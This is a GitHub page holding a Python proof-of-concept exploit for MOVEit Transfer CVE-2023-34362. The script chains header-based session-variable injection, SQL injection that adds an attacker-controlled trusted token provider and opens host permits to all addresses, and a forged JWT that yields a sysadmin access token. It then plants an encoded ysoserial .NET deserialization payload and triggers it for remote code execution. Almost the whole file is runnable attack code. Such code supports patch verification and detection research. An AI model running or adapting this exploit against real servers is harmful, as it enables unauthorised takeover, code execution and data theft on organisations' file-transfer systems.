-
Notifications
You must be signed in to change notification settings - Fork 34
/
Copy pathCVE-2023-34362.py
319 lines (271 loc) · 14.2 KB
/
CVE-2023-34362.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
#!/usr/bin/python3
import argparse
import base64
import datetime
import hashlib
import json
import sys
import re
from typing import Optional
import jwt
import requests
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def get_csrf(s: requests.Session, url: str) -> Optional[str]:
"""
Sends a POST request to guestaccess.aspx with specific data. This data causes
guestaccess.aspx to generate a CSRF token for our current session.
"""
data = {
# Arg06 is required to get SILGuestAccess.cs to generate a page with a csrf token
# This must match MyPkgAccessCode session variable
"Arg06": "123",
}
r = s.post(f"{url}/guestaccess.aspx", data=data, verify=False)
body = r.text
match = re.search(r'name="csrftoken" value="([^"]*)"', body)
if match:
csrf_token = match.group(1)
return csrf_token
else:
return None
def dict_to_session_var_dict(d: dict) -> dict:
"""
Takes a dictionary with key value pairs representing session variables and their values and converts
it to a dictionary of X-siLock-SessVar header values
"""
s = dict()
for i, k in enumerate(d):
s[f"X-siLock-SessVar{i}"] = f"{k}: {d[k]}"
return s
def set_session_variables(s: requests.Session, session_vars: dict, url: str) -> None:
"""
Uses a vulnerability in MOVEitISAPI.dll to set session variables for our session.
"""
headers = {
# MOVEitISAPI.dll will only forward our request to SILMachine2 if the transaction is "folder_add_by_path".
# We trick MOVEitISAPI.dll to use "folder_add_by_path" as its transaction by setting xx-silock-transaction.
# SILMachine2 will not process xx-silock-transaction and instead takes X-siLock-Transaction which is set to
# session_setvars.
"xx-silock-transaction": "folder_add_by_path",
"X-siLock-Transaction": "session_setvars",
}
headers.update(dict_to_session_var_dict(session_vars))
s.post(f"{url}/moveitisapi/moveitisapi.dll?action=m2", headers=headers, verify=False)
def get_session_id(s: requests.Session, url: str) -> str:
"""
Sends a request to populate the ASP.NET_SessionId cookie
"""
r = s.get(url, verify=False)
session_id = r.cookies['ASP.NET_SessionId']
return session_id
def do_guest_access(s: requests.Session, csrf: str, url: str):
"""
Trigger the SQL injection
"""
data = {
"CsrfToken": csrf,
"transaction": "secmsgpost",
"Arg01": "email_subject",
"Arg04": "email_body",
"Arg06": "123",
"Arg05": "send",
"Arg08": "[email protected]",
"Arg09": "attachment_list"
}
r = s.post(f"{url}/guestaccess.aspx", data=data, verify=False)
def do_injection(sql_statements: list[str], s: requests.Session, csrf: str, url: str):
# Make sure there are no commas in our statements. This is a limitation of our vulnerability. The field that
# contains the injection is treated by the MOVEit application as a list of email addresses. The MOVEit application
# will split the list on commas before passing it to the SQL engine.
for statement in sql_statements:
if "," in statement:
raise Exception(
f"SQL statement '{statement} contains a comma. Refactor your statement to remove the comma.\n")
for sql_statement in sql_statements:
#print(f"Running SQL statement: {sql_statement}")
session_vars = {
"MyPkgID": "0",
f"MyPkgSelfProvisionedRecips": f"SQL Injection'); {sql_statement} -- asdf",
}
set_session_variables(s, session_vars, url)
do_guest_access(s, csrf, url)
def create_jwt(amurl: str):
"""
Create the jwt required to get the access token.
"""
with open("./key.pem", 'r') as f:
private_key = f.read()
with open('cert.crt', 'rb') as cert_file:
cert_data = cert_file.read()
cert = x509.load_pem_x509_certificate(cert_data, default_backend())
# Get the DER form of the certificate
der = cert.public_bytes(serialization.Encoding.DER)
# Copmute the SHA-1 hash
sha1 = hashlib.sha1(der).digest()
# Base64url encode the hash
x5t = base64.urlsafe_b64encode(sha1).rstrip(b'=')
# Define the headers to include the x5t value
headers = {
'x5t': x5t.decode()
}
payload = {
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022,
'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=5), # Set the expiration time
'aud': 'https://prgsftoutlookaddintest.z14.web.core.windows.net/readDialog.html',
"appctx": {
"msexchuid": "exchange",
"Version": "ExIdTok.V1",
"amurl": amurl
}
}
return jwt.encode(payload, private_key, algorithm='RS256', headers=headers)
def get_access_token(encoded_jwt: str, url: str) -> str:
print("[*] Getting sysadmin access token")
data = {
"grant_type": "external_token",
"external_token_type": "MicrosoftOutlook",
"external_token": encoded_jwt,
"language": "en",
}
resp = requests.post(f"{url}/api/v1/auth/token", data=data, verify=False)
j = resp.json()
access_token = j["access_token"]
print("[*] Got access token")
return access_token
def delete_file(url, access_token, file_id):
print("[*] Deleting uploaded file")
h = {
"Authorization": f"Bearer {access_token}",
}
resp = requests.delete(f"{url}/api/v1/files/{file_id}", headers=h, verify=False)
if resp.status_code == 204:
print("[*] Uploaded file deleted")
else:
print("[-] Failed to delete uploaded file")
def get_folder_id(url, access_token):
print("[*] Getting FolderID")
h = {
"Authorization": f"Bearer {access_token}"
}
resp = requests.get(f"{url}/api/v1/folders", headers=h, verify=False)
j = resp.json()
items = j.get("items")
if items:
folder_id = items[0]["id"]
print(f"[*] Got FolderID: {folder_id}")
return folder_id
else:
print("[-] Failed to get FolderID")
sys.exit()
def start_upload(url, access_token, folder_id):
print("[*] Starting file upload")
# ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "cmd.exe /C echo DIRTY MIKE AND THE BOYS WERE HERE > C:\Windows\Temp\message.txt" -o base64
payload = "AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAFIvYyBjbWQuZXhlIC9DIGVjaG8gRElSVFkgTUlLRSBBTkQgVEhFIEJPWVMgV0VSRSBIRVJFID4gQzpcV2luZG93c1xUZW1wXG1lc3NhZ2UudHh0BgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgs="
p = {
"uploadType": "resumable"
}
d = {
"name": "letusin",
"size": "0",
"comments": payload
}
h = {
"Authorization": f"Bearer {access_token}",
}
resp = requests.post(f"{url}/api/v1/folders/{folder_id}/files", headers=h, params=p, files=d, verify=False)
j = resp.json()
file_id = j.get("fileId")
if file_id:
print(f"[*] Got FileID: {file_id}")
return file_id
else:
print(f"[-] Failed to get FileID! Try changing the file name.")
sys.exit()
def inject_payload(sess, url, csrf, file_id):
# SQL inject the ysoserial .NET payload
print("[*] Injecting the payload")
payload_statements = [
f"UPDATE `fileuploadinfo` SET `State` = `Comment` WHERE `FileID` = {file_id};"
]
do_injection(payload_statements, sess, csrf, url)
print("[*] Payload injected")
def trigger_payload(url, access_token, folder_id, file_id):
print("[*] Triggering payload via resume call")
p = {
"uploadType": "resumable",
"fileId": file_id
}
h = {
"Authorization": f"Bearer {access_token}",
}
resp = requests.put(f"{url}/api/v1/folders/{folder_id}/files", headers=h, params=p, verify=False)
if 'Internal Server Error' in resp.text:
print("[+] Triggered the payload!")
else:
print("[-] Failed to trigger the payload")
sys.exit()
def parse_args():
parser = argparse.ArgumentParser(description="POC for MOVEit Transfer CVE-2023-34362")
parser.add_argument('-u', '--url', type=str, help='The URL of the MOVEit Transfer target')
parser.add_argument('-p', '--provider', type=str, help='Provider address used for authentication callback')
return parser.parse_args()
def main():
args = parse_args()
s = requests.Session()
session_id = get_session_id(s, args.url)
# Setup session vars to get correct CSRF
session_vars = {
"MyUsername": "Guest",
"MyPkgAccessCode": "123",
"MyGuestEmailAddr": "[email protected]",
}
set_session_variables(s, session_vars, args.url)
csrf = get_csrf(s, args.url)
# Create our SQL injection statements
provider = args.provider
token_id = f"exchange__{provider}"
comment = "LetUsIn"
sql_statements = [
f"INSERT INTO `userexternaltokens` (`TokenId`) VALUES ('{token_id}');",
f"UPDATE `userexternaltokens` SET `InstID` = 0 WHERE `TokenId` = '{token_id}';",
f"UPDATE `userexternaltokens` SET `TokenType` = '' WHERE `TokenId` = '{token_id}';",
f"UPDATE `userexternaltokens` INNER JOIN `users` ON users.LoginName = 'sysadmin' SET userexternaltokens.UserName = users.UserName WHERE userexternaltokens.TokenId = '{token_id}';",
# Allow logins with external IP
f"INSERT INTO `hostpermits` (`Comment`) VALUES ('{comment}');",
f"UPDATE `hostpermits` SET `InstID` = 0 WHERE `Comment` = '{comment}';",
f"UPDATE `hostpermits` SET `Rule` = 1 WHERE `Comment` = '{comment}';",
f"UPDATE `hostpermits` SET `Host` = '*.*.*.*' WHERE `Comment` = '{comment}';",
f"UPDATE `hostpermits` SET `PermitID` = 3 WHERE `Comment` = '{comment}';",
f"UPDATE `hostpermits` SET `Priority` = 1 WHERE `Comment` = '{comment}';",
# Add a trusted external token provider
f"INSERT INTO `trustedexternaltokenproviders` (`ProviderURL`) VALUES ('{provider}');",
f"UPDATE `trustedexternaltokenproviders` SET `InstID` = 0 WHERE `ProviderURL` = '{provider}';",
f"UPDATE `trustedexternaltokenproviders` SET `ProviderName` = 'moveit' WHERE `ProviderURL` = '{provider}';"
]
do_injection(sql_statements, s, csrf, args.url)
encoded_jwt = create_jwt(args.provider)
access_token = get_access_token(encoded_jwt, args.url)
print(f"[*] Access token: {access_token}")
# Clean up our database modifications
cleanup_statements = [
# Remove our external token
f"DELETE FROM `userexternaltokens` WHERE `TokenId` = '{token_id}';",
# Remove our host permits rule
f"DELETE FROM `hostpermits` WHERE `Comment` = '{comment}';",
# Remove the trusted external provider
f"DELETE FROM `trustedexternaltokenproviders` WHERE `ProviderURL` = '{provider}';",
]
do_injection(cleanup_statements, s, csrf, args.url)
# Use the sysadmin session to gain RCE via deserialization during a file upload
folder_id = get_folder_id(args.url, access_token)
file_id = start_upload(args.url, access_token, folder_id)
inject_payload(s, args.url, csrf, file_id)
trigger_payload(args.url, access_token, folder_id, file_id)
if __name__ == "__main__":
main()